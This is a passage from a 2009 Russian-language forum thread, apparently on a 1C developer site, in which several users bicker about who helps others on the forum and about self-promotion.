(88) > А ты спросил, есть ли у модераторов возможность чистить здесь сообщения?

еще раз повторяю (см.83). Я просил не Модера, а Админа
92. Олег Пономаренко (O-Planet) 6635 12.02.09 20:00 Сейчас в теме
93. Сhe Burashka (CheBurator) 12.02.09 20:04 Сейчас в теме
ух.. хорошо что я не придирчивый.. в 95% времени....
94. Сhe Burashka (CheBurator) 12.02.09 20:05 Сейчас в теме
но мну реально прет ржач... я уже стал побольше времени даже на партнерский форум и проклаб уделять...
95. Альтаир (Altair777) 633 12.02.09 20:08 Сейчас в теме
(92)
Это твое право. Но не обязанность. Обязанности у тебя другие. А, то что ты их не выполняешь - конечно, не может быть предметом гордости.

Скольким людям за последний месяц-два ты помог на форуме?
Лично я - немногим, хотя и старался. А ты хоть кому-то?
имхо, больше всех - Ёпрст.
96. Олег Пономаренко (O-Planet) 6635 12.02.09 20:18 Сейчас в теме
(95) Да не люблю я подсчитывать. И ко мне больше в личку обращаются, также пишут на сайт. Да и по-разному мы с тобой понимаем помощь. Я - вот так: http://infostart.ru/projects/445/ . А ты, похоже, как в (90) :))
97. Сhe Burashka (CheBurator) 12.02.09 20:25 Сейчас в теме
(96) хватить пиарить шпингалеты!!!!
Altair777; +1 Ответить
98. Альтаир (Altair777) 633 12.02.09 20:28 Сейчас в теме
(96)
> Да не люблю я подсчитывать.
Я задал простой вопрос. Про твою помощь на форуме.
Скольким? Порядок хотя бы назови. 0?

> А ты, похоже, как в (90) :))
Это твое субъективное мнение.

> И ко мне больше в личку обращаются
А ко мне не только в личку тут, на ИС пишут, но еще и в аську.
И я никому не отказал. Вот вчера буквально задали мне вопрос, на который я не смог ответить. И я обратился за помощью к своему знакомому.
Но я все это не выставляю напоказ и не самопиарю, как ты сделал в (96).
99. Олег Пономаренко (O-Planet) 6635 12.02.09 20:30 Сейчас в теме
(98) >> Но я все это не выставляю напоказ
Угу ))

А в 90 я просто "ответил на твой простой вопрос". Чем помощь на форуме лучше помощи в разделе "Программы"?
100. Альтаир (Altair777) 633 12.02.09 20:32 Сейчас в теме
(99)
> А в 90 я просто "ответил на твой простой вопрос"

Прицел сбился? 90 - это мой пост.
101. Олег Пономаренко (O-Planet) 6635 12.02.09 20:44 Сейчас в теме